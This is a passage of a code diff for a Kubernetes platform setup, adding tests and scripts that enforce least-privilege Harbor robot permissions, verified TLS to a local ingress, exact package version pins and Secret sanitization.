+        self.assertEqual(self.forProvider["isRemovedCheck"]["type"], "CUSTOM")
+
+
+class CrashSafeIdentityLogicTest(unittest.TestCase):
+    """Exercise the actual CUSTOM jq logic against synthetic LIST responses --
+    the concrete, provider-verified meaning of "rediscovers the robot from
+    its declared identity alone"."""
+
+    @classmethod
+    def setUpClass(cls):
+        cls.forProvider = _load()["spec"]["forProvider"]
+
+    def _expected_logic(self):
+        return self.forProvider["expectedResponseCheck"]["logic"]
+
+    def _removed_logic(self):
+        return self.forProvider["isRemovedCheck"]["logic"]
+
+    def _matching_robot(self):
+        return {
+            "name": "robot$crossplane-system",
+            "level": "system",
+            "permissions": [
+                {"kind": "system", "namespace": "/", "access": [{"resource": "project", "action": "create"}]},
+                {
+                    "kind": "project",
+                    "namespace": "*",
+                    "access": [
+                        {"resource": "robot", "action": "create"},
+                        {"resource": "robot", "action": "read"},
+                        {"resource": "artifact", "action": "read"},
+                    ],
+                },
+            ],
+        }
+
+    def test_a_matching_robot_in_the_list_is_synced_and_not_removed(self):
+        doc = {"response": {"statusCode": 200, "body": [self._matching_robot()]}}
+        self.assertTrue(_run_jq(self._expected_logic(), doc))
+        self.assertFalse(_run_jq(self._removed_logic(), doc))
+
+    def test_an_empty_list_is_removed_and_not_synced(self):
+        doc = {"response": {"statusCode": 200, "body": []}}
+        self.assertFalse(_run_jq(self._expected_logic(), doc))
+        self.assertTrue(_run_jq(self._removed_logic(), doc))
+
+    def test_a_non_200_is_uncertain_not_removed_and_not_synced(self):
+        # A non-200/error response proves nothing about whether the robot
+        # actually exists in Harbor -- it must never be treated as a
+        # confirmed absence (that would re-trigger CREATE against a name
+        # Harbor's own uniqueness constraint may already hold). Only a
+        # genuine HTTP 200 list that omits the robot counts as "removed".
+        doc = {"response": {"statusCode": 500, "body": "error"}}
+        self.assertFalse(_run_jq(self._expected_logic(), doc))
+        self.assertFalse(_run_jq(self._removed_logic(), doc))
+
+    def test_a_401_is_uncertain_not_removed_and_not_synced(self):
+        doc = {"response": {"statusCode": 401, "body": "unauthorized"}}
+        self.assertFalse(_run_jq(self._expected_logic(), doc))
+        self.assertFalse(_run_jq(self._removed_logic(), doc))
+
+    def test_a_malformed_200_body_is_uncertain_not_removed_and_not_synced(self):
+        # Harbor is contractually a JSON array on 200, but a malformed/non-
+        # array body must not be trusted as a confirmed absence either.
+        doc = {"response": {"statusCode": 200, "body": {"unexpected": "object"}}}
+        self.assertFalse(_run_jq(self._expected_logic(), doc))
+        self.assertFalse(_run_jq(self._removed_logic(), doc))
+
+    def test_wrong_permissions_is_not_synced_but_not_removed(self):
+        # The name already exists in Harbor (matched by name/level) -- must
+        # not be reported as removed, or a mismatched/drifted identity would
+        # re-trigger CREATE against a name Harbor's own uniqueness
+        # constraint already holds.
+        robot = self._matching_robot()
+        robot["permissions"][1]["access"] = [{"resource": "robot", "action": "delete"}]
+        doc = {"response": {"statusCode": 200, "body": [robot]}}
+        self.assertFalse(_run_jq(self._expected_logic(), doc))
+        self.assertFalse(_run_jq(self._removed_logic(), doc))
+
+    def test_extra_permission_action_is_not_synced_but_not_removed(self):
+        # Issue #285 review finding: expectedResponseCheck must enforce exact
+        # least-privilege permissions -- an extra action alongside the
+        # required ones (e.g. Harbor RBAC drifting to also grant
+        # robot:delete) must never be silently trusted as synced. The name
+        # still matches, so this must not be reported as removed either.
+        robot = self._matching_robot()
+        robot["permissions"][1]["access"].append({"resource": "robot", "action": "delete"})
+        doc = {"response": {"statusCode": 200, "body": [robot]}}
+        self.assertFalse(_run_jq(self._expected_logic(), doc))
+        self.assertFalse(_run_jq(self._removed_logic(), doc))
+
+    def test_a_differently_named_robot_in_the_list_does_not_match(self):
+        robot = self._matching_robot()
+        robot["name"] = "robot$some-other-robot"
+        doc = {"response": {"statusCode": 200, "body": [robot]}}
+        self.assertFalse(_run_jq(self._expected_logic(), doc))
+        self.assertTrue(_run_jq(self._removed_logic(), doc))
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/platform/tests/test_harbor_proxy_cache_diagnostics.py
+++ b/platform/tests/test_harbor_proxy_cache_diagnostics.py
@@ -58,8 +58,14 @@ def _run_with_fake_curl(fake_curl):
         env = os.environ.copy()
         env["PATH"] = tmp + os.pathsep + env["PATH"]
         env["HARBOR_ADMIN_PASSWORD"] = "fixture-password-never-print"
+        # Model the optional Secret volume after the bootstrap has populated it.
+        # Keep the harness unprivileged and isolated rather than writing /etc.
+        ca_path = os.path.join(tmp, "ca.crt")
+        with open(ca_path, "w", encoding="utf-8") as fh:
+            fh.write("fixture-public-ca\n")
+        script = _script().replace("/etc/digiorg-ca/ca.crt", ca_path)
         return subprocess.run(
-            ["/bin/sh", "-c", _script()],
+            ["/bin/sh", "-c", script],
             capture_output=True,
             text=True,
             env=env,

--- a/platform/tests/test_keycloak_image.py
+++ b/platform/tests/test_keycloak_image.py
@@ -60,7 +60,7 @@ DEPLOYMENT = os.path.join(
 # The exact coordinates fixed by the issue and the pin-policy allowlist.
 UPSTREAM_IMAGE = "quay.io/keycloak/keycloak"
 UPSTREAM_TAG = "26.7.0"
-UPSTREAM_DIGEST = "sha256:2eb3cd316835c990e69e26ade292ffa78f6fb0db7d5fc6377463c162e1979ac0"
+UPSTREAM_DIGEST = "sha256:0f198be292568439d700cdbfb893e69a6009bb43a94a06a945b1d3d506c76b13"
 IMAGE = "digiorg/keycloak"
 TAG = "26.7.0-optimized"
 FULL_IMAGE = "%s:%s" % (IMAGE, TAG)

--- a/platform/tests/test_nushell_literal_parentheses.py
+++ b/platform/tests/test_nushell_literal_parentheses.py
@@ -1,0 +1,71 @@
+#!/usr/bin/env python3
+"""Runtime regression tests for literal parentheses in Nushell interpolation.
+
+Inside ``$"..."`` Nushell treats unescaped parentheses as subexpressions. A
+human-readable annotation such as ``(private)`` therefore attempts to execute a
+command named ``private``. These tests execute the real status-print statements
+from ``scripts/local-setup.nu`` so parse-only checks cannot miss this again.
+"""
+from pathlib import Path
+import subprocess
+import unittest
+
+
+ROOT = Path(__file__).resolve().parents[2]
+SETUP = ROOT / "scripts" / "local-setup.nu"
+
+
+def _statement_containing(marker: str) -> str:
+    matches = [line.strip() for line in SETUP.read_text(encoding="utf-8").splitlines()
+               if marker in line and line.strip().startswith("print $")]
+    if len(matches) != 1:
+        raise AssertionError(f"expected one print statement containing {marker!r}, got {len(matches)}")
+    return matches[0]
+
+
+def _run_statement(marker: str, preamble: str = "") -> subprocess.CompletedProcess[str]:
+    statement = _statement_containing(marker)
+    return subprocess.run(
+        ["nu", "-c", f"{preamble}{statement}"],
+        cwd=ROOT,
+        text=True,
+        capture_output=True,
+        check=False,
+    )
+
+
+class NushellLiteralParenthesesRuntimeTest(unittest.TestCase):
+    def assert_statement_renders_literal(self, marker: str, literal: str, preamble: str = ""):
+        result = _run_statement(marker, preamble)
+        self.assertEqual(result.returncode, 0, result.stderr)
+        self.assertIn(literal, result.stdout)
+
+    def test_app_config_private_annotation_is_literal(self):
+        self.assert_statement_renders_literal("Repository 'DigiOrg/app-config' created", "(private)")
+
+    def test_missing_argocd_optional_annotation_is_literal(self):
+        self.assert_statement_renders_literal("argocd CLI not found", "(optional)")
+
+    def test_incompatible_argocd_optional_annotation_is_literal(self):
+        self.assert_statement_renders_literal(
+            "argocd CLI found but not compatible",
+            "v3.4.x (optional)",
+            'let expected_argocd_minor = "3.4"; ',
+        )
+
+    def test_gitea_credential_annotations_are_literal(self):
+        cases = (
+            ("'crossplane-gitea-credentials' already present", "(membership re-verified)"),
+            ("Least-privilege 'crossplane-gitea-credentials' created", "(write:repository only)"),
+            ("ArgoCD app-config repository credential already present", "(membership re-verified)"),
+            ("ArgoCD app-config repository credential created", "(read:repository only)"),
+            ("Backstage app-config publish credential already present", "(membership re-verified)"),
+            ("Least-privilege 'backstage-gitea-credentials' created", "(write:repository only)"),
+        )
+        for marker, literal in cases:
+            with self.subTest(marker=marker):
+                self.assert_statement_renders_literal(marker, literal)
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/platform/tests/test_pin_policy.py
+++ b/platform/tests/test_pin_policy.py
@@ -122,6 +122,31 @@ class GitSourceRuleTest(unittest.TestCase):
         self.assertEqual(_images_from(text), [])
 
 
+class PackagePinRuleTest(unittest.TestCase):
+    """Crossplane `Provider`/`Function` package.yaml `spec.package` refs (Issue
+    #285 added function-kcl/function-auto-ready) must pin an exact version,
+    same as Helm charts -- no `latest`, no bare/untagged package, no range."""
+
+    def _pkg(self, ref, kind="Function"):
+        return f"apiVersion: pkg.crossplane.io/v1beta1\nkind: {kind}\nmetadata:\n  name: x\nspec:\n  package: {ref}\n"
+
+    def test_exact_version_package_is_accepted(self):
+        v = _images_from(self._pkg("xpkg.upbound.io/crossplane-contrib/function-kcl:v0.12.2"))
+        self.assertEqual(v, [])
+
+    def test_latest_tag_package_is_rejected(self):
+        v = _images_from(self._pkg("xpkg.upbound.io/crossplane-contrib/function-kcl:latest"))
+        self.assertTrue(any(x.kind == "package" for x in v))
+
+    def test_untagged_package_is_rejected(self):
+        v = _images_from(self._pkg("xpkg.upbound.io/crossplane-contrib/function-kcl"))
+        self.assertTrue(any(x.kind == "package" for x in v))
+
+    def test_range_tag_package_is_rejected(self):
+        v = _images_from(self._pkg("xpkg.upbound.io/crossplane-contrib/function-kcl:^0.12.0"))
+        self.assertTrue(any(x.kind == "package" for x in v))
+
+
 class RealTreeIsCleanTest(unittest.TestCase):
     """The committed manifests must satisfy the pin policy end-to-end."""
 

--- a/platform/tests/test_provider_kubernetes_secret_sanitization.py
+++ b/platform/tests/test_provider_kubernetes_secret_sanitization.py
@@ -1,0 +1,26 @@
+#!/usr/bin/env python3
+"""Provider-kubernetes must never mirror Secret data into Object status."""
+
+from pathlib import Path
+import unittest
+import yaml
+
+MANIFEST = Path(__file__).resolve().parents[2] / "crossplane/providers/packages/provider-kubernetes.yaml"
+
+
+class ProviderKubernetesSecretSanitizationTest(unittest.TestCase):
+    def test_runtime_enables_secret_status_sanitization(self):
+        docs = list(yaml.safe_load_all(MANIFEST.read_text()))
+        runtime = next(doc for doc in docs if doc and doc.get("kind") == "DeploymentRuntimeConfig")
+        containers = runtime["spec"]["deploymentTemplate"]["spec"]["template"]["spec"]["containers"]
+        package_runtime = next(container for container in containers if container.get("name") == "package-runtime")
+        env = {item["name"]: str(item.get("value", "")) for item in package_runtime.get("env", [])}
+        self.assertEqual(
+            env.get("SANITIZE_SECRETS", "").lower(),
+            "true",
+            "provider-kubernetes v1.2.1 defaults sanitization off and otherwise copies Secret.data into Object status.atProvider.manifest",
+        )
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/platform/tests/test_runner_ca_rotation_bootstrap.py
+++ b/platform/tests/test_runner_ca_rotation_bootstrap.py
@@ -1,0 +1,42 @@
+#!/usr/bin/env python3
+"""Fresh-bootstrap safety for the Gitea runner CA rotation restart."""
+
+from pathlib import Path
+import re
+import unittest
+
+SOURCE = (Path(__file__).resolve().parents[2] / "scripts/local-setup.nu").read_text()
+
+
+class RunnerCaRestartBootstrapSafetyTest(unittest.TestCase):
+    def test_phase_3_uses_optional_restart_before_gitea_configuration(self):
+        restart = SOURCE.index('restart_oidc_deployment_if_present "gitea" "gitea-actions-runner"')
+        configure = SOURCE.index("    configure_gitea\n", restart)
+        self.assertLess(restart, configure)
+
+    def test_optional_restart_distinguishes_missing_from_lookup_failure(self):
+        match = re.search(
+            r"def restart_oidc_deployment_if_present .*?\n}\n",
+            SOURCE,
+            flags=re.DOTALL,
+        )
+        self.assertIsNotNone(match)
+        body = match.group(0) if match is not None else ""
+        self.assertIn("--ignore-not-found", body)
+        self.assertRegex(body, r"exit_code\s*!=\s*0")
+        self.assertRegex(body, r"stdout.*is-empty")
+        self.assertIn("restart_oidc_deployment $namespace $deployment $timeout", body)
+
+    def test_strict_restart_helper_remains_fail_closed_for_required_deployments(self):
+        strict = re.search(
+            r"def restart_oidc_deployment \[.*?\n}\n",
+            SOURCE,
+            flags=re.DOTALL,
+        )
+        self.assertIsNotNone(strict)
+        strict_body = strict.group(0) if strict is not None else ""
+        self.assertIn("Required OIDC-dependent deployment", strict_body)
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/platform/tests/test_runner_ca_rotation_bootstrap.py
+++ b/platform/tests/test_runner_ca_rotation_bootstrap.py
@@ -9,10 +9,21 @@ SOURCE = (Path(__file__).resolve().parents[2] / "scripts/local-setup.nu").read_t
 
 
 class RunnerCaRestartBootstrapSafetyTest(unittest.TestCase):
-    def test_phase_3_uses_optional_restart_before_gitea_configuration(self):
+    def test_phase_3_checks_token_before_optional_restart_and_gitea_configuration(self):
+        token_lookup = SOURCE.index("get secret gitea-actions-runner-token")
         restart = SOURCE.index('restart_oidc_deployment_if_present "gitea" "gitea-actions-runner"')
         configure = SOURCE.index("    configure_gitea\n", restart)
+        self.assertLess(token_lookup, restart)
         self.assertLess(restart, configure)
+
+    def test_fresh_bootstrap_restart_requires_existing_runner_token(self):
+        main_up = re.search(r'def "main up" \[\] \{.*?\n}\n', SOURCE, flags=re.DOTALL)
+        self.assertIsNotNone(main_up)
+        body = main_up.group(0) if main_up is not None else ""
+        self.assertIn("get secret gitea-actions-runner-token", body)
+        self.assertIn("--ignore-not-found", body)
+        self.assertRegex(body, r"runner_token_lookup\.exit_code\s*!=\s*0")
+        self.assertIn("if $gitea_ca_changed and $runner_token_exists {", body)
 
     def test_optional_restart_distinguishes_missing_from_lookup_failure(self):
         match = re.search(

--- a/platform/tests/test_tls_hardening.py
+++ b/platform/tests/test_tls_hardening.py
@@ -1,0 +1,202 @@
+#!/usr/bin/env python3
+"""Issue #285 TLS hardening: every credential-bearing first-party path
+(Gitea API/Git, Harbor API, the OCI registry) must go through the trusted
+digiorg.local ingress (CA: cert-manager/digiorg-local-ca-secret) over HTTPS.
+No plain-HTTP credential transport, `curl -k`/`insecureSkipVerify`, or
+`NODE_TLS_REJECT_UNAUTHORIZED=0` anywhere in that path.
+
+This file covers the pieces that don't already have a dedicated home:
+provider-http's shared ProviderConfig TLS trust, Backstage's CA mount, and
+the bootstrap script's CA-copy-to-namespace + explicit-`--cacert` behavior.
+(The Argo app-config repo URL and the Gitea Actions runner have their own
+existing test files -- test_appclaim_delivery.py's GitOpsRepoURLTest and
+test_gitea_actions_runner.py respectively -- and were extended in place.)
+
+Run:
+    python3 platform/tests/test_tls_hardening.py
+"""
+
+import os
+import sys
+import unittest
+
+try:
+    import yaml
+except ImportError:  # pragma: no cover - environment guard
+    sys.stderr.write("PyYAML is required: pip install pyyaml\n")
+    raise
+
+REPO_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
+SETUP = os.path.join(REPO_ROOT, "scripts", "local-setup.nu")
+PROVIDER_HTTP_CONFIG = os.path.join(
+    REPO_ROOT, "crossplane", "providers", "configs", "provider-http-config.yaml"
+)
+HARBOR_BOOTSTRAP_REQUEST = os.path.join(
+    REPO_ROOT, "crossplane", "bootstrap", "harbor-robot-request.yaml"
+)
+BACKSTAGE_DEPLOYMENT = os.path.join(
+    REPO_ROOT, "platform", "base", "backstage", "deployment.yaml"
+)
+
+
+def _read(path):
+    with open(path, encoding="utf-8") as fh:
+        return fh.read()
+
+
+def _func_body(text, name):
+    start = text.index(f"def {name} ")
+    end = text.index("\ndef ", start + 10)
+    return text[start:end]
+
+
+def _yaml_docs(path):
+    return [d for d in yaml.safe_load_all(_read(path)) if d]
+
+
+class SetupTextFixture(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        cls.text = _read(SETUP)
+
+
+class ProviderHttpProviderConfigTlsTest(unittest.TestCase):
+    """The shared provider-http ProviderConfig (referenced by every Request
+    in both core's bootstrap and core-catalog's AppClaim pipeline) must
+    carry spec.tls.caCertSecretRef, verified against the pinned v1.0.14
+    ProviderConfigSpec (apis/cluster/v1alpha1/providerconfig_types.go:
+    `TLS *common.TLSConfig \\`json:"tls,omitempty"\\``) so every Request
+    inherits verified TLS without repeating trust config per-Request."""
+
+    @classmethod
+    def setUpClass(cls):
+        cls.doc = yaml.safe_load(_read(PROVIDER_HTTP_CONFIG))
+
+    def test_provider_config_declares_tls_ca_cert_secret_ref(self):
+        tls = self.doc["spec"].get("tls")
+        self.assertIsNotNone(tls, "spec.tls must be set")
+        ref = tls["caCertSecretRef"]
+        self.assertEqual(ref["key"], "ca.crt")
+        self.assertTrue(ref["name"])
+        self.assertTrue(ref["namespace"])
+
+    def test_never_sets_insecure_skip_verify(self):
+        tls = self.doc["spec"].get("tls") or {}
+        self.assertFalse(tls.get("insecureSkipVerify", False))
+
+    def test_ca_secret_referenced_lives_in_the_crossplane_provider_namespace(self):
+        # crossplane-system is where every other credential Secret this
+        # provider already reads (crossplane-gitea-credentials,
+        # crossplane-harbor-credentials) also lives.
+        ref = self.doc["spec"]["tls"]["caCertSecretRef"]
+        self.assertEqual(ref["namespace"], "crossplane-system")
+
+
+class HarborBootstrapRobotTransportTest(unittest.TestCase):
+    """The one-time system-robot bootstrap Request must talk to Harbor
+    through the trusted digiorg.local ingress, not the raw in-cluster
+    harbor-core Service address."""
+
+    @classmethod
+    def setUpClass(cls):
+        cls.doc = yaml.safe_load(_read(HARBOR_BOOTSTRAP_REQUEST))
+
+    def test_base_url_is_https_digiorg_local(self):
+        base_url = self.doc["spec"]["forProvider"]["payload"]["baseUrl"]
+        self.assertEqual(base_url, "https://digiorg.local/api/v2.0")
+
+    def test_no_plain_http_or_in_cluster_service_dns_remains(self):
+        text = _read(HARBOR_BOOTSTRAP_REQUEST)
+        self.assertNotIn("http://", text)
+        self.assertNotIn(".svc.cluster.local", text)
+
+
+class BackstageCaTrustTest(unittest.TestCase):
+    """Backstage's own outbound HTTPS calls (Keycloak OIDC discovery, and
+    the Gitea integration once core-portal's app-config.yaml points at
+    https://digiorg.local/gitea) must trust the digiorg-local CA via a
+    mounted copy of the public certificate and NODE_EXTRA_CA_CERTS -- never
+    NODE_TLS_REJECT_UNAUTHORIZED=0, which disables certificate verification
+    for every outbound HTTPS call the process makes, not just the intended
+    one."""
+
+    @classmethod
+    def setUpClass(cls):
+        cls.doc = yaml.safe_load(_read(BACKSTAGE_DEPLOYMENT))
+        cls.container = cls.doc["spec"]["template"]["spec"]["containers"][0]
+
+    def test_node_tls_reject_unauthorized_is_not_set(self):
+        env_names = {e["name"] for e in self.container["env"]}
+        self.assertNotIn("NODE_TLS_REJECT_UNAUTHORIZED", env_names)
+
+    def test_node_extra_ca_certs_points_at_a_mounted_file(self):
+        env = {e["name"]: e for e in self.container["env"]}
+        self.assertIn("NODE_EXTRA_CA_CERTS", env)
+        ca_path = env["NODE_EXTRA_CA_CERTS"]["value"]
+        mount_paths = {vm["mountPath"] for vm in self.container["volumeMounts"]}
+        self.assertTrue(
+            any(ca_path == p or ca_path.startswith(p.rstrip("/") + "/") for p in mount_paths),
+            f"NODE_EXTRA_CA_CERTS={ca_path!r} is not under any volumeMount path {mount_paths!r}",
+        )
+
+    def test_ca_volume_sources_a_secret_not_a_literal(self):
+        volumes = self.doc["spec"]["template"]["spec"]["volumes"]
+        ca_volumes = [v for v in volumes if "secret" in v]
+        self.assertGreater(len(ca_volumes), 0, "expected at least one Secret-backed volume for the CA")
+
+
+class CaCopyToNamespacesTest(SetupTextFixture):
+    """The bootstrap script must copy only the public CA certificate (never
+    cert-manager's private key) from cert-manager/digiorg-local-ca-secret
+    into every namespace running a client that needs to verify the
+    digiorg.local ingress's certificate: crossplane-system (provider-http's
+    ProviderConfig), backstage, and gitea (the Actions runner)."""
+
+    def test_copy_function_is_defined_exactly_once(self):
+        self.assertEqual(self.text.count("def copy_digiorg_local_ca_to_namespace ["), 1)
+
+    def test_copy_function_never_reads_the_ca_private_key(self):
+        body = _func_body(self.text, "copy_digiorg_local_ca_to_namespace")
+        self.assertNotIn("tls.key", body)
+        self.assertIn("ca.crt", body)
+
+    def test_main_up_copies_the_ca_into_every_consumer_namespace(self):
+        body = _func_body(self.text, '"main up"')
+        for namespace in ("crossplane-system", "backstage", "gitea"):
+            self.assertIn(
+                f'copy_digiorg_local_ca_to_namespace "{namespace}"',
+                body,
+                f"main up must copy the CA into the {namespace} namespace",
+            )
+
+    def test_ca_copy_runs_before_gitea_actions_runner_restart_is_needed(self):
+        body = _func_body(self.text, '"main up"')
+        copy_gitea_idx = body.index('copy_digiorg_local_ca_to_namespace "gitea"')
+        configure_gitea_idx = body.index("configure_gitea")
+        self.assertLess(
+            copy_gitea_idx, configure_gitea_idx,
+            "the gitea namespace CA copy must happen before configure_gitea/the runner needs it",
+        )
+
+
+class NoInsecureCurlTest(SetupTextFixture):
+    """Every curl call this script makes against the digiorg.local ingress
+    for a credential-bearing Gitea Admin API operation must verify the
+    server certificate explicitly (--cacert), never skip verification
+    (-k/--insecure)."""
+
+    def test_no_curl_dash_k_against_digiorg_local(self):
+        for line in self.text.splitlines():
+            if "digiorg.local" in line and "curl" in line:
+                self.assertNotRegex(
+                    line, r"-[a-zA-Z]*k\b(?!eychain)",
+                    f"insecure curl flag found: {line!r}",
+                )
+
+    def test_gitea_admin_api_calls_use_explicit_cacert(self):
+        body = _func_body(self.text, "configure_app_config_repo")
+        self.assertIn("--cacert", body)
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/scripts/README.md
+++ b/scripts/README.md
@@ -77,16 +77,17 @@ ArgoCD creates the child Applications via the root App. The core Applications us
 | bootstrap | root-app | Deployed by the script after the core data layer is functionally ready |
 | -1 | namespaces | Pre-create platform namespaces |
 | 0 | cert-manager, external-secrets, nats, opensearch, postgresql | Foundation + core data layer |
-| 1 | keycloak, argocd | Identity + self-managed ArgoCD |
+| 1 | keycloak, argocd, nats-jetstream-controller | Identity + self-managed ArgoCD + NACK JetStream controller |
 | 2 | backstage, gitea, grafana, harbor, jaeger, landingpage, opencost, sonarqube | Platform services |
 | 3 | crossplane, kyverno | Extensions and policy |
 | 4 | crossplane-providers, fluentd, kyverno-policies | Provider plugins, log shipping, policies |
 | 5 | monitoring-extras | ServiceMonitors (requires monitoring stack) |
 | 6 | crossplane-provider-configs | Provider configurations |
-| 7 | crossplane-xrds | Composite Resource Definitions |
-| 8 | core-catalog | Core catalog |
+| 7 | crossplane-xrds, crossplane-harbor-bootstrap | Composite Resource Definitions + least-privilege Harbor system robot (Issue #285) |
+| 8 | core-catalog | Core catalog (single deterministic AppClaim pipeline Composition) |
 | 9 | cnpg | **Manual** optional future-app database operator |
 | 10 | cnpg-cluster | **Manual** optional future-app database cluster |
+| 11 | app-config | AppClaim GitOps sink (Issue #285) — reconciles merged AppClaim manifests from the private DigiOrg/app-config Gitea repository |
 
 `up` directly applies PostgreSQL and OpenSearch and proves their real Service paths ready before creating the root App. Sync waves alone are not used as a readiness guarantee. CNPG is never promoted by `up`; run `nu scripts/local-setup.nu future-infra` explicitly when the optional future-app database infrastructure is required.
 
@@ -102,8 +103,12 @@ After all core ArgoCD apps reach their required state, the script runs the post-
 - Registers the self-signed CA cert in the Gitea container trust store
 - Adds Keycloak as an OIDC provider via `gitea admin auth add-oauth` CLI inside the pod
 - Creates initial realm users: `digiorgadmin` and `digiorgdeveloper`
-- Creates the `DigiOrg` organisation via the `tea` CLI (v0.9.2, downloaded into the pod)
+- Creates the `DigiOrg` organisation via the Gitea REST API (bootstrap admin token, generated once and persisted to `gitea/gitea-bootstrap-token`)
 - Adds both users to the DigiOrg Owners team via the Gitea API
+- **(Issue #285)** `configure_app_config_repo`: creates the private `DigiOrg/app-config` repository — the GitOps sink `apps/platform/app-config.yaml` watches — and seeds its `claims/` directory (matching core-portal's `publishPhase.git.targetPath` exactly)
+- **(Issue #285)** `configure_crossplane_gitea_credentials`: creates a dedicated `crossplane-provisioner` Gitea user + `platform-provisioners` team (repo-create only, no org admin), generates a `write:repository`-only token, and persists it to `crossplane-system/crossplane-gitea-credentials` — the Secret the AppClaim pipeline Composition's `{{ crossplane-gitea-credentials:crossplane-system:token }}` placeholders read
+- **(Issue #285)** `configure_argocd_gitea_access`: creates a dedicated `argocd-reader` Gitea user with `read`-only collaborator access on `DigiOrg/app-config` only, generates a `read:repository`-only token, and persists the ArgoCD repository-credential Secret `argocd/app-config-repo-creds`
+- All three new steps are resume-safe: if their target Secret already exists, it is preserved and the step is a no-op
 
 #### b) `configure_sonarqube`
 - Waits for SonarQube to report status `UP`
@@ -116,7 +121,10 @@ After all core ArgoCD apps reach their required state, the script runs the post-
 Restarts ArgoCD Server, Grafana, Backstage, and Landing Page to pick up Keycloak OIDC configuration.
 
 #### d) `patch_argocd_oidc_ca` (runs during Phase 2 wait)
-Embeds the self-signed CA certificate into the ArgoCD Helm release via `helm upgrade --reuse-values` so ArgoCD self-sync does not overwrite it. The cert is also saved to `./digiorg-local-ca.crt` for local trust store import.
+Embeds the self-signed CA certificate into the ArgoCD Helm release via `helm upgrade --reuse-values` so ArgoCD self-sync does not overwrite it. The cert is also saved to `./digiorg-local-ca.crt` for local trust store import. **(Issue #285)** The private `DigiOrg/app-config` GitOps sink repository is cloned through the trusted `https://digiorg.local/gitea` ingress; Argo CD receives the local CA so credential-bearing Git traffic never falls back to plaintext HTTP.
+
+#### e) Declarative Harbor system-robot bootstrap (`crossplane-harbor-bootstrap` Application, Issue #285)
+Not a Nushell step: `crossplane/bootstrap/harbor-robot-request.yaml` is a `provider-http` `Request` applied by ArgoCD (wave 7) that creates a least-privilege Harbor **system** robot (`project:create` system-wide plus `robot:create`, `robot:read`, and `artifact:read` project-wildcard access — never delete/user/registry access) using the Harbor admin Basic-auth value `create_platform_namespaces_secrets` precomputes into `harbor/harbor-admin-basic-auth`. Its response is captured via `secretInjectionConfigs` into `crossplane-system/crossplane-harbor-credentials` (`name`, `secret`, and a precomputed `basicAuth`), which the AppClaim pipeline Composition's Harbor project/robot `Request` resources read.
 
 ## Service Access
 

--- a/scripts/check_pins.py
+++ b/scripts/check_pins.py
@@ -38,10 +38,25 @@ SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
 ALLOWLIST_PATH = os.path.join(SCRIPT_DIR, "pin-policy-allowlist.yaml")
 
 # Directories scanned for manifests (repo-relative).
-SCAN_DIRS = ("apps", "platform/base")
+SCAN_DIRS = ("apps", "platform/base", "crossplane/providers/packages")
 
 # First-party repositories: GitOps self-references may track ``main``.
-FIRST_PARTY_REPOS = ("https://github.com/digiorg/core.git", "https://github.com/digiorg/core")
+#
+# ``https://digiorg.local/gitea/DigiOrg/app-config.git``
+# (Issue #285) is the platform's own GitOps sink for generated AppClaim
+# manifests, not an external supply-chain dependency: DigiOrg controls it,
+# every change is a reviewed pull request, and its entire purpose is that
+# merging a PR to ``main`` reconciles immediately. Pinning it to a commit
+# (like the external ``digiorg/core-catalog`` dependency, which legitimately
+# needs reproducible pins) would require a core-repo change for every single
+# AppClaim and defeat the self-service delivery path this issue exists to
+# unblock. The trusted ingress URL is used with the local CA distributed to
+# Argo CD -- see apps/platform/app-config.yaml and local-setup.nu.
+FIRST_PARTY_REPOS = (
+    "https://github.com/digiorg/core.git",
+    "https://github.com/digiorg/core",
+    "https://digiorg.local/gitea/DigiOrg/app-config.git",
+)
 
 DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")
 EXACT_SEMVER_RE = re.compile(r"^v?\d+\.\d+\.\d+([-.][0-9A-Za-z.-]+)?$")
@@ -56,7 +71,7 @@ IMAGE_LIKE_RE = re.compile(r"^[a-z0-9]([a-z0-9._/-]*[a-z0-9])?(:[\w][\w.-]*)?(@s
 class Violation:
     file: str
     line: int
-    kind: str  # "image" | "chart" | "git"
+    kind: str  # "image" | "chart" | "git" | "package"
     ref: str
     message: str
 
@@ -111,6 +126,37 @@ def _check_chart_rev(rev) -> str | None:
     if not EXACT_SEMVER_RE.match(rev):
         return f"chart targetRevision '{rev}' is not an exact SemVer"
     return None
+
+
+def _check_package_rev(ref: str) -> str | None:
+    """Validate a Crossplane Provider/Function `spec.package` xpkg reference.
+
+    Same exact-SemVer discipline as Helm chart pins (Issue #285 added
+    function-kcl/function-auto-ready alongside the pre-existing
+    provider-http/provider-kubernetes/provider-helm/function-patch-and-transform
+    packages, none of which were previously covered by any pin check).
+    """
+    if not ref or ":" not in ref:
+        return f"package '{ref}' has no tag — pin an exact version"
+    tag = ref.rsplit(":", 1)[-1]
+    if tag in ("latest", "main", "master", "stable", "edge", ""):
+        return f"package tag ':{tag}' is floating — pin an exact version"
+    if RANGE_CHARS_RE.search(tag):
+        return f"package tag '{tag}' is a range/wildcard — pin an exact version"
+    if not EXACT_SEMVER_RE.match(tag):
+        return f"package tag '{tag}' is not an exact SemVer"
+    return None
+
+
+def _walk_package_refs(doc, out: list):
+    """Collect `spec.package` from Crossplane Provider/Function manifests."""
+    if not isinstance(doc, dict):
+        return
+    kind = doc.get("kind")
+    if kind in ("Provider", "Function"):
+        pkg = (doc.get("spec") or {}).get("package")
+        if isinstance(pkg, str) and pkg:
+            out.append(pkg)
 
 
 def _normalize_repo(url: str) -> str:
@@ -172,6 +218,13 @@ def scan_text(path: str, text: str, allow: set[str] | None = None) -> list[Viola
             msg = _check_image(ref, allow)
             if msg:
                 violations.append(Violation(path, _line_of(text, ref), "image", ref, msg))
+
+        packages: list = []
+        _walk_package_refs(doc, packages)
+        for ref in packages:
+            msg = _check_package_rev(ref)
+            if msg:
+                violations.append(Violation(path, _line_of(text, ref), "package", ref, msg))
 
         sources: list = []
         _walk_sources(doc, sources)

--- a/scripts/local-setup.nu
+++ b/scripts/local-setup.nu
@@ -2067,12 +2067,15 @@ def persist_opaque_secret [namespace: string, name: string, key: string, value: 
     scrub_secret_last_applied_annotation $namespace $name
 
     let readback = (do {
